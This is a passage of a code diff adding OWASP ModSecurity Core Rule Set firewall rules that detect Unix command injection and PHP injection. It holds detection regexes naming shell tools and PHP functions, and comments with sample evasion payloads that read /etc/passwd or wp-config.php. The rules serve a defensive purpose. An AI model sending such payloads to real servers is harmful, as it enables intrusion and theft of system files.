'\"]*a[\\\\'\"]*l|x[\\\\'\"]*e[\\\\'\"]*c|n[\\\\'\"]*v)|d[\\\\'\"]*(?:m[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*g|a[\\\\'\"]*s[\\\\'\"]*h|i[\\\\'\"]*f[\\\\'\"]*f|o[\\\\'\"]*a[\\\\'\"]*s)|g[\\\\'\"]*(?:z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c)|j[\\\\'\"]*(?:o[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*\s+[\\\\'\"]*-[\\\\'\"]*x|a[\\\\'\"]*v[\\\\'\"]*a)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*i|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|i[\\\\'\"]*r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|o[\\\\'\"]*n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r|h[\\\\'\"]*(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)|v[\\\\'\"]*i[\\\\'\"]*(?:g[\\\\'\"]*r|p[\\\\'\"]*w)|G[\\\\'\"]*E[\\\\'\"]*T)[\\\\'\"]*(?:\s|;|\||&|<|>)" \ + "id:932150,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell snippets ] +# +# Detect some common sequences found in shell commands and scripts. +# +# Some commands which were restricted in earlier rules due to FP, +# have been added here with their full path, in order to catch some +# cases where the full path is sent. +# +# This rule is also triggered by an Apache Struts Remote Code Execution exploit: +# [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ] +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile unix-shell.data" \ + "id:932160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:cmdLine,t:normalizePath,t:lowercase,\ + msg:'Remote Command Execution: Unix Shell Code Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Shellshock vulnerability (CVE-2014-6271 and CVE-2014-7169) ] +# +# Detect exploitation of "Shellshock" GNU Bash RCE vulnerability. +# +# Based on ModSecurity rules created by Red Hat. +# Permission for use was granted by Martin Prpic +# +# https://access.redhat.com/articles/1212303 +# +SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \ + "id:932170,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,\ + msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ + "id:932171,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:urlDecodeUni,\ + msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ Restricted File Upload ]=- +# +# Detects attempts to upload a file with a forbidden filename. +# +# Many application contain Unrestricted File Upload vulnerabilities. +# https://www.owasp.org/index.php/Unrestricted_File_Upload +# +# These might be abused to upload configuration files or other files +# that affect the behavior of the web server, possibly causing remote +# code execution. +# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \ + "@pmFromFile restricted-upload.data" \ + "id:932180,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Restricted File Upload Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + + +# +# -=[ Rule 932200 ]=- +# +# Block RCE Bypass using different techniques: +# - uninitialized variables (https://www.secjuice.com/web-application-firewall-waf-evasion/) +# - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) +# - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) +# +# Examples: +# - foo;cat$u+/etc$u/passwd +# - bar;cd+/etc;/bin$u/ca*+passwd +# - foo;ca\t+/et\c/pa\s\swd +# - foo;c'at'+/etc/pa's'swd +# +# Regex notes: https://regex101.com/r/JgZFRi/7 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ([*?`\\'][^/\n]+/|\$[({\[#a-zA-Z0-9]|/[^/]+?[*?`\\'])" \ + "id:932200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule MATCHED_VAR "@rx /" "t:none,t:urlDecodeUni,chain" + SecRule MATCHED_VAR "@rx \s" "t:none,t:urlDecodeUni,\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + +# Missing Unix commands have been added to a new word list i.e. +# util/regexp-assemble/regexp-932106.txt +# These commands may have a higher risk of false positives. +# Therefore, they have been split off to a separate rule in PL3. +# For explanation of this rule, see rule 932100. +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* +# [regexp assembled from util/regexp-assemble/regexp-932106.txt] +# \b" \ +# +# This rule is a stricter sibling of rule 932100. + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:(?:(?:a[\\\\'\"]*p[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*u[\\\\'\"]*d|u[\\\\'\"]*p[\\\\'\"]*2[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t)[\\\\'\"]*e|d[\\\\'\"]*n[\\\\'\"]*f|v[\\\\'\"]*i)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*(?:a[\\\\'\"]*c[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*(?:\s|<|>).*|w[\\\\'\"]*d|s)|w[\\\\'\"]*(?:(?:\s|<|>).*|h[\\\\'\"]*o))\b" \ + "id:932106,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# +# -=[ Bypass Rule 930120 (wildcard) ]=- +# +# When Paranoia Level is set to 1 and 2, a Remote Command Execution +# could be exploited bypassing rule 930120 (OS File Access Attempt) +# by using wildcard characters. +# +# In some other cases, it could be bypassed even if the Paranoia Level is set to 3. +# Please, keep in mind that this rule could lead to many false positives. +# +SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \ + "id:932190,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:urlDecodeUni,t:normalizePath,t:cmdLine,\ + msg:'Remote Command Execution: Wildcard bypass technique attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-932-APPLICATION-ATTACK-RCE" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf new file mode 100644 index 000000000..58be88f2f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf @@ -0,0 +1,734 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ PHP Injection Attacks ]=- +# +# [ References ] +# http://rips-scanner.sourceforge.net/ +# https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh +# + +# +# [ PHP Open Tag Found ] +# +# Detects PHP open tags "', but +# this resulted in false positives which were difficult to prevent. +# Therefore, that pattern is now checked by rule 933190 in paranoia levels +# 3 or higher. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:\/|\\\\)?php\])" \ + "id:933100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:lowercase,\ + msg:'PHP Injection Attack: PHP Open Tag Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# [ PHP Script Uploads ] +# +# Block file uploads with filenames ending in PHP related extensions +# (.php, .phps, .phtml, .php5 etc). +# +# Many application contain Unrestricted File Upload vulnerabilities. +# https://www.owasp.org/index.php/Unrestricted_File_Upload +# +# Attackers may use such a vulnerability to achieve remote code execution +# by uploading a .php file. If the upload storage location is predictable +# and not adequately protected, the attacker may then request the uploaded +# .php file and have the code within it executed on the server. +# +# Also block files with just dot (.) characters after the extension: +# https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. +# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\.*$" \ + "id:933110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Configuration Directives ] +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-config-directives.data" \ + "id:933120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:normalisePath,t:lowercase,\ + msg:'PHP Injection Attack: Configuration Directive Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule MATCHED_VARS "@pm =" \ + "capture,\ + ctl:auditLogParts=+E,\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Variables ] +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-variables.data" \ + "id:933130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,t:urlDecodeUni,t:lowercase,\ + msg:'PHP Injection Attack: Variables Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP I/O Streams ] +# +# The "php://" syntax can be used to refer to various objects, such as local files (for LFI), +# remote urls (for RFI), or standard input/request body. Its occurrence indicates a possible attempt +# to either inject PHP code or exploit a file inclusion vulnerability in a PHP web app. +# +# Examples: +# php://filter/resource=./../../../wp-config.php +# php://filter/resource=http://www.example.com +# php://stdin +# php://input +# +# http://php.net/manual/en/wrappers.php.php +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)php://(?:std(?:in|out|err)|(?:in|out)put|fd|memory|temp|filter)" \ + "id:933140,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: I/O Stream Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Wrappers ] +# +# PHP comes with many built-in wrappers for various URL-style protocols for use with the filesystem +# functions such as fopen(), copy(), file_exists() and filesize(). Abusing of PHP wrappers like phar:// +# could lead to RCE as describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even +# wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and expect:// to RCE. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:zlib|glob|phar|ssh2|rar|ogg|expect|zip)://" \ + "id:933200,\ + phase:2,\ + block,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ + msg:'PHP Injection Attack: Wrapper scheme detected',\ + logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions ] +# +# Detecting PHP function names is useful to block PHP code injection attacks. +# There are many PHP functions. We have to strike a balance between robust detection +# of PHP code in content, and the risk of false positives. +# +# The list of PHP functions is divided into four groups of varying attack/false positive risk. +# Four separate rules are used to detect these groups of functions: +# +# - Rule 933150: ~40 words highly common to PHP injection payloads and extremely rare in +# natural language or other contexts. +# Examples: 'base64_decode', 'file_get_contents'. +# These words are detected as a match directly using @pmFromFile. +# Function names are defined in php-function-names-933150.data +# +# - Rule 933160: ~220 words which are common in PHP code, but have a higher chance to cause +# false positives in natural language or other contexts. +# Examples: 'chr', 'eval'. +# To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'. +# Regexp is generated from function names in util/regexp-assemble/regexp-933160.data +# +# - Rule 933151: ~1300 words of lesser importance. This includes most PHP functions and keywords. +# Examples: 'addslashes', 'array_diff'. +# For performance reasons, the @pmFromFile operator is used, and many functions from lesser +# used PHP extensions are removed. +# To mitigate false positives, we only match when the '(' character is also found. +# This rule only runs in paranoia level 2 or higher. +# Function names are defined in php-function-names-933151.data +# +# - Rule 933161: ~200 words with short or trivial names, possibly leading to false positives. +# Examples: 'abs', 'cos'. +# To mitigate false positives, a regexp matches on function syntax, e.g. 'abs()'. +# This rule only runs in paranoia level 3 or higher. +# Regexp is generated from function names in util/regexp-assemble/regexp-933161.data +# + + +# +# [ PHP Functions: High-Risk PHP Function Names ] +# +# Rule 933150 contains a small list of function names which are highly indicative of a PHP +# injection attack, for example 'base64_decode'. +# We block these function names outright, without using a complex regexp or chain. +# This could make the detection a bit more robust against possible bypasses. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933150.data" \ + "id:933150,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: High-Risk PHP Function Name Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions: High-Risk PHP Function Calls ] +# +# Some PHP function names have a certain risk of false positives, due to short +# names, full or partial overlap with common natural language terms, uses in +# other contexts, et cetera. Some examples are 'eval', 'exec', 'system'. +# +# For these function names, we apply a regexp to look for PHP function syntax. +# The regexp looks for a word boundary and adjoining parentheses. +# For instance, we want to block 'eval()', but we want to allow 'medieval()'. +# +# We have to be careful of possible bypasses using comment syntax. Examples: +# +# system(...) +# system (...) +# system\t(...) +# system /*comment*/ (...) +# system /*multiline \n comment*/ (...) +# system //comment \n (...) +# system #comment \n (...) +# +# This rule is also triggered by the following exploit(s): +# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ] +# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ] +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +# Regexp generated from util/regexp-assemble/regexp-933160.data using Regexp::Assemble. +# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. +# +# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble +# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create|socket_client)|ipc?slashes|rev)|implexml_load_(?:string|file)|ocket_c(?:onnect|reate)|h(?:ow_sourc|a1_fil)e|pl_autoload_register|ystem)|p(?:r(?:eg_(?:replace(?:_callback(?:_array)?)?|match(?:_all)?|split)|oc_(?:(?:terminat|clos|nic)e|get_status|open)|int_r)|o(?:six_(?:get(?:(?:e[gu]|g)id|login|pwnam)|mk(?:fifo|nod)|ttyname|kill)|pen)|hp(?:_(?:strip_whitespac|unam)e|version|info)|g_(?:(?:execut|prepar)e|connect|query)|a(?:rse_(?:ini_file|str)|ssthru)|utenv)|r(?:unkit_(?:function_(?:re(?:defin|nam)e|copy|add)|method_(?:re(?:defin|nam)e|copy|add)|constant_(?:redefine|add))|e(?:(?:gister_(?:shutdown|tick)|name)_function|ad(?:(?:gz)?file|_exif_data|dir))|awurl(?:de|en)code)|i(?:mage(?:createfrom(?:(?:jpe|pn)g|x[bp]m|wbmp|gif)|(?:jpe|pn)g|g(?:d2?|if)|2?wbmp|xbm)|s_(?:(?:(?:execut|write?|read)ab|fi)le|dir)|ni_(?:get(?:_all)?|set)|terator_apply|ptcembed)|g(?:et(?:_(?:c(?:urrent_use|fg_va)r|meta_tags)|my(?:[gpu]id|inode)|(?:lastmo|cw)d|imagesize|env)|z(?:(?:(?:defla|wri)t|encod|fil)e|compress|open|read)|lob)|a(?:rray_(?:u(?:intersect(?:_u?assoc)?|diff(?:_u?assoc)?)|intersect_u(?:assoc|key)|diff_u(?:assoc|key)|filter|reduce|map)|ssert(?:_options)?)|h(?:tml(?:specialchars(?:_decode)?|_entity_decode|entities)|(?:ash(?:_(?:update|hmac))?|ighlight)_file|e(?:ader_register_callback|x2bin))|f(?:i(?:le(?:(?:[acm]tim|inod)e|(?:_exist|perm)s|group)?|nfo_open)|tp_(?:nb_(?:ge|pu)|connec|ge|pu)t|(?:unction_exis|pu)ts|write|open)|o(?:b_(?:get_(?:c(?:ontents|lean)|flush)|end_(?:clean|flush)|clean|flush|start)|dbc_(?:result(?:_all)?|exec(?:ute)?|connect)|pendir)|m(?:b_(?:ereg(?:_(?:replace(?:_callback)?|match)|i(?:_replace)?)?|parse_str)|(?:ove_uploaded|d5)_file|ethod_exists|ysql_query|kdir)|e(?:x(?:if_(?:t(?:humbnail|agname)|imagetype|read_data)|ec)|scapeshell(?:arg|cmd)|rror_reporting|val)|c(?:url_(?:file_create|exec|init)|o